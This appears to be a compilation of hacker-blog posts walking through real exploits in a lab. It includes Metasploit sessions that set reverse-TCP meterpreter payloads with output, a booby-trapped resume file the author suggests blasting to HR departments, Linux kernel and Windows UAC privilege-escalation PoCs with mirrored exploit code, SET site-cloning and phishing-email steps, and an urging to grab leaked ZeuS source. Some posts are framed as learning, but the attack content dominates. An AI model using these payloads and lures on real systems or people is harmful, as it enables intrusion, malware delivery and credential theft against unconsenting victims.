I recently came across a really interesting intro writeup on browser exploit packs. The research team installed and tested over 40 different packs and provided some really nice feedback, here is the link.

For anyone that is not familiar what an exploit packs is, here is a brief definition;  “A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to alter a user’s browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.”

The infamous ZeuS or zbot Trojan has made a name for itself in this arena. Even though zbot does not directly exploit any system vulnerability however it is very successful when it comes to infecting its victim. Zeus, which until recently was being sold on the underground black market for anywhere from $5,000-$10,000 or even more; because of this it was hard for the average guy to get his hands on a copy to review the source code.

Well not until a few days ago that is, now if you do a search for “Download the ZeuS Source Code”, you will come across several sites that are hosting a leaked copy of “Zeus 2.0.8.9″, and from the looks of things its a fully loaded copy. With that said grab your copy, turn on your VM’s and let the learning begin.

Links:

https://secure.wikimedia.org/wikipedia/en/wiki/Browser_exploit

http://www.scmagazineuk.com/zeus-source-code-now-available-for-5000-as-predictions-made-that-its-cost-will-continue-to-drop/article/199995/

http://www.mdl4.com/2011/05/download-zeus-source-code/

Now while reading about exploit pack I started wondering how I can get myself a copy without having to spend

How many times have you fired off a Nessus scan and then after finding the goodies you have to go to either ExploitDB , or a similar site in search for a exploit. Or if you are a pro then its off to go and write your own exploit for the newly discovered vulnerability.

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juice vulnerability. If this is the first time you have heard of ExploitDB or Metasploit you should first visit the Metasploit Unleashed training site.

Lab setup

• Backtrack 4 Linux VM
• Windows 2003 server with a  vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for  exploiting your system.

Step one: Install Nessus

You can download your copy of nessus from HERE and don’t forget to register for a homefeed license. Now create your scan policy or used from one of the default policies. I selected the web application policy since the target server was running and outdated web application.  Once your scan is completed download the report and save it in a .nessus format.

Step two: Launching  Metasploit

Login to your machine of choice, in my case its my BackTrack4 Linux VM. Issue the following commands to load Metasploit:

• cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
• ./msfconsole
• svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned nessus report, and then perform your hacking kungfu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host 10.10.0.19
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command will search Metasploit for any exploits that matches your various vulnerability from the Nessus report, it will not automatically run the exploit for our unless you use the -e option. In most cases if you are testing this against a live system then you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   10.10.0.19:445  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]   10.10.0.19:80  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================
[*]
[*]

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST 10.10.0.17
LHOST => 10.10.0.17
msf exploit(apache_mod_rewrite_ldap) > set RHOST 10.100.0.9
RHOST => 10.100.0.9
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on its GAME OVER!

References:
http://www.metasploit.com/modules/exploit/windows/smb/psexec
http://www.metasploit.com/modules/exploit/windows/http/apache_mod_rewrite_ldap
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.tenable.com/products/nessus/documentation

With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at www.metasploit.com has created a working exploit module for this that I was testing and it seem to be working as stated.

According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution.  In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Test Lab Setup:

• I used Vmware Workstation with two hosts (XP, and BT4)
• I tested this against a Windows XP SP3 host
• I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
• Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

• Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.

• Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection

• Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file.  We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to  connect back home .

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it  you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.

Refernce links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

About an hour or so ago I notice a posting on the Full Disclosure mailing list with a proof of concept code (PoC) that will allow a non-privileged user to gain Root access on a Linux system , below is a snippet from the comment section of the code that explains it.

–snip–

/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* ————-
* This is the interesting one, and the reason I wrote this exploit.  If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok().  However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* ————-
* This is a NULL pointer dereference in the Econet protocol.  By itself, it’s
* fairly benign as a local denial-of-service.  It’s a perfect candidate to
* trigger the above issue, since it’s reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* ————-
* I wouldn’t be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren’t able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
*  * The particular symbols I resolve are not exported on Slackware or Debian
*  * Red Hat does not support Econet by default
*  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
*    Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn’t have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex.  It wouldn’t be too hard to fix this up, but I didn’t bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*/

Naturally I would feel incline to turn up a Linux VM to test this exploit, I decided to go with a fully patched Ubuntu 10.10 with kernel version 2.6.35-23-generic to start my testing however the exploit fail on this system. I then decided to go with a default install of Unbuntu 10.10 with Kernel version 2.6.35-22-generic and to my amazement it worked.

Steps taken:

Ensure that I have gcc isntalled since the exploit was written in C.

infolookup@ubuntu:/tmp/exploitpoc$ touch full-nelson.c

Once the file is created simply copy the PoC from http://pastebin.com/qKZp2Qic or from the original post
and paste it into your newly created file.

infolookup@ubuntu:/tmp/exploitpoc$ nano full-nelson.c

Next just execute it….

infolookup@ubuntu:/tmp/exploitpoc$ gcc full-nelson.c -o full-nelson

infolookup@ubuntu:/tmp/exploitpoc$ ./full-nelson.c

And as you can see from the image above “Got Root”!

Updated with Q&A section at the bottom.

As referenced in my last post, a public release  proof of concept (POC) for bypassing the  User Access Control (UAC) feature on Windows Vista and 7 operating systems is in the wild. The vulnerability is a buffer overflow in kernel (win32k.sys). The vulnerability exist in a function that queries the registry so in order to exploit this the attacker has to be able to create a special (malicious) registry key.

The author’s PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (so, a user that does not even have any administrative privileges). The PoC code creates such a registry key and calls another library which tries to read the key and during that process it ends up calling the vulnerable code in win32k.sys.

According to the author of the POC code ,” I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCU\EUDC\[Language]\SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.”

POC Test:

Version Windows 7 Professional

Steps:

1. I first created a standard none privileged user, and from the command prompt typed “whoami” to identify my user, I then typed “net users” to few all available users on the system. Lastly I tried to create a new user with “NET USER testhack P@$$w0rd /add” and received access denied as expected.
2. Next download the POC code, and extract it to a folder of your choice, then from the command prompt change directory to that folder and execute the “poc.exe” file. From here on you will have escalated privileges of the “nt/system user”.

At this point it’s GAME OVER!!

Updated with a few questions I emailed the author of the POC exploit

Me: How did you get your start in information security?

POC Author: By the randomness of the universe, I started one day when I discovered debugging

Me: How long have you been doing exploit development?

POC Author: I’ve been doing reverse engineering since 2004 but not exclusively in exploit development.

Me: How did you discovered this flaw?

POC Author: By chance when I read WDK or windows driver kit code samples

Me: What steps did you take to notify the vendor about this issue? What time line did Microsoft give for a patch to this issue?

POC Author: This flaw was reported with enough detail and the same PoC released on the internet to Microsoft Security Response Center  MSRC. They didn’t give a time line. Actually the guy who was issued to work on this never contacted me!

Me: Since this disclosure were you contacted by Microsoft or anyone else who were upset about your decision to disclose this flaw?

POC Author: No, despite the fact that my initial CodeProject article were brought down, probably due to the pressure from MS.

Me: Realistically how long do you think it will take before this flaw is patched?

POC Author: First of all I wouldn’t pick a day before Thanksgiving to publish this if I’m not mad enough that this flaw remains unpatched almost a year since Microsoft’s first acknowledge. Due to the nature that the flaw is from the design of an API, and it has been widely used by third party drivers, probably this won’t be entirely fixed until Windows 8. But meanwhile, MS could have taken measures to block such exploits, such as restricting the API not to query certain types of value to avoid ambiguity.

Me: Were you giving a reason by codeprojects for pulling your posting?

POC Author: Yes, they give me the responsible disclosure thing.

Additional comments by author:

If I have to keep my mouth shut until MS release a patch for such exploit, then probably everyone will be threatened more than now, because from what I know, there had been malware which use this exploit since August, not none said by some security companies. Those exploit a registry key ActiveTimeBias which works perfectly on all versions of Windows, to bypass proactive defense and execute malicious code.

I must say thank you for answering my questions and I support your decision for releasing this PoC and details about the flaw, if MS was given a full year to take care of this and they didn’t even respond to you why should you keep quiet!

References:

http://isc.sans.edu/diary.html?storyid=9988

http://www.exploit-db.com/exploits/15609/

Now the reason for this post is just to mirror what I think should be public knowledge and not be kept hidden since it was initially release yesterday. Today when I revisited the original site to download the POC and do some testing in my lab I  noticed it was removed. After looking around online a bit I found a few sites there were mirroring the information and I decided to do the same.

Bypassing UAC with User Privilege under Windows Vista/7

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);        // Get current code page
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL, &hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

__try
{
    EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

License

About the Author

noobpwnftw

I had this post queuing up for a while now but kept holding back waiting on the new version of Metasploit 3.5.0-dev, in addition each time I visited the Metasploit IRC room I would see Zate talking about some cool feature he is working on implementing.

Now on to the reason for this post, being a fan of both Metasploit and Nessus I was very happy when I saw a tweet a month or so back making mention of a project that would bring both of these wonderful tools together in a nice easy to use fashion. That project was labeled ” Nessus Bridge for Metasploit”. The basic goal behind this project was to  “allow you to do various tasks with your Nessus server, from within the msf command line.  By that I mean scan with Nessus, review the results, import the results and then exploit the results.” After reading those few lines form the project home page I was already sold.

What can you do with this plug-in or bridge you might ask?

The commands are broken up into the following categories below and are covered in details over at the http://blog.zate.org .

• Generic Commands
• Reports Commands
• Scan Commands
• Plugin Commands
• User Commands
• Policy Commands

A few prerequisites are needed before you can start hacking away:

• A host with Metasploit installed and configured (I recommend BackTrack 4)
• A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
• A vulnerable host to test with (I recommend you download metasploitable)

Brief  demo section before I get into the interview:

MSF Console

Nessus Login Interface

1. First fire-up  both Metasploit and Nessus and run an update to ensure you have the latest signatures.
2. Login into Nessus and create your scanning policy
3. Close out your browser and prepare to have some fun CLI style!
   1. Load up the nessus module within msfconle with “load nessus”
   2. Next connect to your nessus server with “nessus_connect username:password@host:port ok”
   3. From this point on you can view all polices, perform a scan, import the rules and then use db_autopwn to seal the deal.
      Using nessus_policy_list and nessus_scan_new

   Import scan results with “nessus_report_get report id”

   db_autopwn

Now on to the Q & A  section with the Author:

Question: How did you get started on your Infosec journey, and also the blogging  sphere?

Answer: I started out as a Secure data communication guy for the Australian Army and then left to became a Lotus Notes/Web App guy, migrated over to a Solaris/Linux admin and then into Web App Sec and Threat/Vuln Management.  From there I became interested in pen testing, exploits and just generally how the attacker works/thinks.

Blogging is relatively new for me.  I am bad at it, and my blog came about really because I wanted to get some ideas down out of my head where others could see them.  I’ve not really done much in the way of blogging until the Nessus Plugin as I am bad about keeping up with it and finding things to talk about.  Always seemed to be something else
to do.  I think the plugin has given me something to start with and now I am queuing up posts for weeks ahead.

Q: What was your motivation behind this project?

A: Part of it was being envious of the cool integration that Nexpose has with Metasploit and most of it was being frustrated at having to move between interfaces to try and find things to exploit.  When I first started with Metasploit it was annoying to have these cool exploits to use but I struggled to find exploitable hosts.

I then did the offensivesecurity.com PwB v3 course and gained some knowledge on how to find things to exploit and then I did some playing around with importing nessus scans.  It was clunky and around the same time I was experimenting with putting a Drupal front end on Nessus. Part of that process was the discovery of a cool nessus-xmlrpc ruby library by k0st.

Everything kind of clicked together and I thought what if i could stick that library in Metasploit and talk directly to the my Nessus server and import the data right into Metasploit.  Some awkward talks about licenses later and HDM merged k0st’s library and my basic shell of a plugin.  (Big thanks to k0st for his hard work on the library which i used as a starting point)

Q: What advice would you give  a newcomer that would like start using this  bridge?

A: Test it out and send me (or Metasploit) bug reports/enhancement requests… hehe.  Full guide on using the plugin is up at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/ . Don’t be shy, join #nessus or #metasploit on freenode and ask questions (I am in there as MrUrbanity or Zate).  Start with working with all the tools on one box (nessus, msf, database) and I find Ubuntu (native or vmware player) the best way to start.  Scan things (that you have permission to scan, or own) and play with it, see how it works.

Q: What tips would you give someone for maximizing the usefulness of this  bridge?

A: This plugin wont magically make your Nessus scans more accurate, you still have to tweak/tune them and honestly right now that is probably best done through the web interface for policy tuning.  Don’t expect to scan a class C and have it import easily, big reports are a pain right now (streaming parser coming soon).  Ideally the way to use this is scan, examine, import, pwn.  It’s not a replacement for knowing about exploits and vulnerabilities, you will still need to do some work .

Q: Why did you choose Metasploit above other application/frameworks to incorporate this  functionality?

A: I don’t think there is another offensive exploitation tool out there with the same power and flexibility to allow it’s end users to join in the fun and submit modifications.  It’s one thing to do a RFE (Request for Enhancement) and another entirely to code that enhancement and submit it to be included in the tool.  I think the combination of free msf and a free (or cheap) nessus scanner is pretty powerful for a security guy trying hard to keep his network running securely.  Also ruby is just a joy to code in.

Q: On a personal note, how did you get your handle?

A: I tend to go by MrUrbanity a lot and Urbanity means polite/refined/quiet which depending on who you ask is either me, or not me.  I’m a pretty calm guy, takes quite a bit to offend or upset me so the name kind of fit.

Q: If someone wants to assist you with this project what’s the best approach?Couple of ways.  Email me (zate75 [at] gmail.com) or find me on IRC (freenode in #metasploit and #nessus) or head to http://github.com/Zate/Nessus-Bridge-for-Metasploit – fork it, hack it and submit a pull request for me to include your changes.  I then submit a diff to msfdev about once a week (or when I have significant changes).

A: You can also help me out a great deal by grabbing the code off github and running it and then reporting any bugs or features back to github. Why github and not the metasploit site?  Mainly to not annoy the msfdevs.  This way I can tweak/hack/commit as often as I need to and not impact their work on msf.  I can then just submit working code
when I need it included in msf.

A big thank you to Zate a.k.a MrUrbanity for letting me interview and most importantly for making such a contribution to the community.

I am sure by noon today you will see lots more technology blogs talking about this old but yet new bug. “The Linux kernel has been purged of a bug that gave root access to untrusted users – again.”

Background:

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.

//

The bug was originally discovered by the late hacker Wojciech “cliph” Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. Read the complete article over at The Register..

Sample exploit is already in the wild as show via http://seclists.org/fulldisclosure/2010/Sep/268 . Since I am not a expert in exploit development or analysis I will sit back and wait for the guys over at Metasploit or SET to whip up so I can test.

Unless you don’t follow the Infosec/Social engineering scene you should know what the Social-Engineering toolkit is, and that a new version was  release today, version 0.7 aka “Swagger Wagon”. However since I am really happy that I have a new version to play with I will try to assist anyone that’s new to SET by pointing you in the right direction to get you started and by sharing a bit of information on how the project got started.

I did a post a few weeks back on using version 0.6.1 to exploit the Microsoft windows OS DLL flaw which you can view here. However today’s posting is all about the new features that you are getting with version 0.7, what has been fixed and a mini interview with the creator of SET none other than Mr David Kennedy aka ReL1k.

For a quick recap..

What is SET?

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

New features and bug fixes :

* Fixed the NAT/Port FWD descriptions to be a little bit more descriptive
* Bug fixes on payload gen with x64 bit payloads in Metasploit
* Added new Multi-Attack Payload option to utilize multiple attack vectors
* Incorporated Multi-Attack into each web attack vector
* Added a PID management system in SET for stray processes
* Cleaned up payloadgen code and SET code to reflect new multiattack changes
* Added the web jacking attack vector by white_sheep, emgent, and the Back|Track team
* Fixed an issue with ARP Cache defaulting, it should now poison everyone
* Added better error handling within the SET menus, still needs a bit more work
* Cleaned up color schema and removed old code
* Added the Adobe CoolType SING Table ‘uniqueName’ Overflow zero day from Metasploit in spear  phishing
* Added two more Teensy based payloads, thanks Garland!
* Added HTML support for Spear-Phishing Attack Vector
* Added HTML support when WEBATTACK_EMAIL=ON for web attack vector
* Added the Adobe Cooltype SING Table Overflow zero day for browser exploit
* Added the new SET User Manual to readme/. This is a big update and has updated content for 0.7
* Fixed a simple yes or no answer when requirements for SET were not met

If you are new to SET you should start here:

1. http://www.secmaniac.com/
2. http://www.social-engineer.org
3. IRC.freenode.net #social-engineer
4. http://www.vimeo.com/14837669
5. http://www.offensive-security.com/metasploit-unleashed/SET

Mini interview with SET’s creator David Kennedy aka “ReL1k”:

Question: Do you think social engineering is a growing threat or would you say its something of the pass?

Answer: Social-Engineering has always been problematic however it is ever increasing because of the controls put in place on the external perimeter. Your typically not seeing the same types of attacks externally facing as you once were. This is a good thing and a testament that security is starting to work in the industry however, with social-engineering you face a whole new slew of problems.

Q: Where did the name SET came from?

A: Me and Chris from social-engineer.org were sitting on skype talking about making a tool, kind of just came to mind and stuck with it.. We never had any idea it would get this big.

Q: What made you start this project?

A: When Chris Hadnagy (loganWHD) was starting up social-engineer.org, we were sitting there talking and came to the conclusion that there really was no penetration testing tools out there dedicated to social-engineering. We knew the effects of social-engineering and how easy it was, but there was nothing out there to help aid in testing social-engineering.

Q:Who was your intended audiences for this framework?

A: I try to keep SET as easy as possible, you have the basic setup, but then you can customize and do more advanced setup based of your needs. It’s really intended for super technical folks as well as hobbyists.

Q: What other framework like this can SET be compared too?

A: I’m not sure there are other frameworks out there that can be compared to SET, it’s specially designed to Social-Engineering, not something that’s really out there. SET can’t be compared to something like a exploitation framework like Metasploit who has full time commitment and years of maturity with some of the most brilliant minds in the industry. But someday hope SET will reach that level on the social-engineer side.

Q: Do you plan on commercialising this project at any point in time and start charging for its use?

A: Never, SET will always remain free and open source. That has always and will always be my goal. *Awesome answer *

Q: What was the total number of downloads for version 0.6.1?

A: SET v0.6.1 has over 1.3 million downloads last time I checked. These are unique IP addresses, not downloads over and over again. I think that’s awesome in some fashions, but scary in another…

Q: What are a few of your favorite features in this new version?

A: The multi-attack is awesome, the ability to load multiple attack vectors in one, then have multiple attacks targeted at a victim. The webjacking is really awesome too, it’s a really convincing attack.

Q: What inspired your new code name for the this version?

A: Well 0.6 was inspired on my favorite drink, Arnold Palmers. This drink for some reason gets me to spit out thousands of lines of code effortlessly. Now in 0.7 (swagger wagon), me and my wife recently added two twins to our household and bought a mini-van, so the family was the influence for this version code name . *I think the should give you a free case for saying that *

Q: What’s the best way someone can contribute to this project if the have ideas and suggestions?

A: Email is the best route, I really try to take every one’s recommendations and if it fits, incorporate it into SET. You can always find me on IRC as well on #social-engineer.org. Or like Kos did, he sent me his python code and I worked it into the 0.6 version of SET. I’m always looking at improving SET and making it better, it wouldn’t be anywhere near where it is now without the help of everyone contributing with bug fixes, ideas, and additions.

So there you have it, a new version is out if you haven’t had a chance to play with older versions now is your change at the new and improve version. I am sure in  few months I will be doing another blog posting if ReL1k keeps drinking those “Arnold Palmers” . Go get your copy, send in your sample codes, report your bugs, and lets make this version hit over 2M downloads.

I have to admit that I am a bit late to the party, but I see this as an opportunity to try out SET and learn a bit about the DLL hijacking issue at the same time.

Last Thursday, Acros, a Slovenian security firm, published an advisory that identified what they call a “binary planting” flaw in iTunes. Essentially, if you open a file type associated with iTunes from a remote network share, iTunes will also try to load one more DLLs from the share. Even if the file that the user opened is completely safe, a malicious DLL can be supplied that will lead to code execution.

HD Moore stated “While working on the Windows Shortcut exploit, he stumbled on this class of bugs and identified a couple dozen applications that seemed to be affected by this problem.  iTunes was one of these applications and the details in the Acros advisory made it clear that this was indeed the same flaw. He was planning to finish the advisories and start contacting vendors on August 20th (last Friday). The  Acros advisory on the 18th threw a wrench into this process.

Microsoft later release the following details  in an advisory:

Microsoft is aware that research has been published detailing a remote attack vector for a class of vulnerabilities that affects how applications load external libraries.

This issue is caused by specific insecure programming practices that allow so-called “binary planting” or “DLL preloading attacks”. These practices could allow an attacker to remotely execute arbitrary code in the context of the user running the vulnerable application when the user opens a file from an untrusted location.

This issue is caused by applications passing an insufficiently qualified path when loading an external library. Microsoft has issued guidance to developers in the MSDN article, Dynamic-Link Library Security, on how to correctly use the available application programming interfaces to prevent this class of vulnerability. Microsoft is also actively reaching out to third-party vendors through the Microsoft Vulnerability Research Program to inform them of the mitigations available in the operating system. Microsoft is also actively investigating which of its own applications may be affected.

In addition to this guidance, Microsoft is releasing a tool that allows system administrators to mitigate the risk of this new attack vector by altering the library loading behavior system-wide or for specific applications. This advisory describes the functionality of this tool and other actions that customers can take to help protect their systems.

Mitigating Factors:

• This issue only affects applications that do not load external libraries securely. Microsoft has previously published guidelines for developers in the MSDN article, Dynamic-Link Library Security, that recommend alternate methods to load libraries that are safe against these attacks.
• For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by a vulnerable application.

• The file sharing protocol SMB is often disabled on the perimeter firewall. This limits the possible attack vectors for this vulnerability.

Demo Time with SET… Thanks to Dave for his wonderful video that he posted this afternoon, I can now use this as my base for this demo.

What is SET?

The Social-Engineer Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform. You can download the Social-Engineering Toolkit through subversion by simply typing this in Back|Track 4 or any other Linux OS.

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

However BT4 now comes with SET located under /pentest/exploits/set, from here you can simply launch SET with a ./set and get your latest updates by selecting option 8.

SET can do tons of cool stuff and I have included a few links at the end of this post that explains them in details, and I have a few post to come that will also go into some more details. However for todays demo I will only be using a few of those features.

Launch and update SET

If you are using BackTrack4 you can find SET located under /pentest/exploits/set, you can launch it with ./set and as stated above select option 8 to get the latest and greatest updates.

Choose your path to pwnage

I selected Option 2 or “Web Attack  Vectors” which is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Select option 2 once more “The Metasploit Browser Exploit Method” this method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

And yet again select option 2, “Site Cloner” this method will completely clone a website of your choosing and allow you to utilize the attack vectors within the same web application you were attempting to clone.

Choosing your browser Exploit:

At this point you have several options to choose from, today we will be picking option 1 “Microsoft Windows WebDAV Application DLL Hijacker”.

Choosing your Payload:

Once more you are giving several options, I choose option 2 “Windows Reverse_TCP Meterpreter“, this payload  will spawn a meterpreter shell on the victim and send it back to the attacker.

Once you are done, you have to choose your vulnerable extension types if you are not certain select enter to choose the defaults, or find a semi-complete list over at exploitdb . At this point the malicious iframes are infected into the cloned website and awaits your victim.

SET Mass E-Mailer Option :

There are two options on the mass e-mailer,we are choosing option1 this option will allow you to send an email to one individual person. Once you are done you have to choose who you would like to send the phishing email too, and who is your sender lastly figure if you would like to use Gmail, your own mail server or some open relay server.

Next think of something clever as a email subject and body. A good example would be to clone a local web-based system from your attacker network and send an email saying “we are doing some updates kindly click to verify you can access this test link. After you are finish click Ctrl + C and hit enter to complete this step. You will then receive a message stating that SET has already sent the email. Now is just a matter of waiting on your victim to click the email and check out the vulnerable files via the network share.

Exploit in action..

Once your victim clicks on the link, the  will be presented with the cloned site at first then the exploit will begin doing its thing in the background. Shortly after the user will be presented with a network share with the vulnerable files. After opening up the file  it  its Game Over.

Since the initial reporting of this issue, many researchers have came out with several ways of doing this so far some of my favorites are:

• Using msfconsole courtesy of the guys HDM in this post.
• Using msfpayload courtesy of Matt over at http://www.attackvector.org/alternative-dll-hijacking-method/
• Yet again Matt demoing using msfpayload + autorun usb stick  http://www.attackvector.org/autorun-dll-hijacker-usb-stick/

I have tested several of these and noticed that MSE AV was effective in identifying the msfpayload file, however using the standard method I successful exploited both windows XP and Windows 7.

Reference links:

http://www.exploit-db.com/exploits/14726/

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

http://blog.rapid7.com/?p=5325

http://www.securityfocus.com/archive/1/513190

http://www.microsoft.com/technet/security/advisory/2269637.mspx

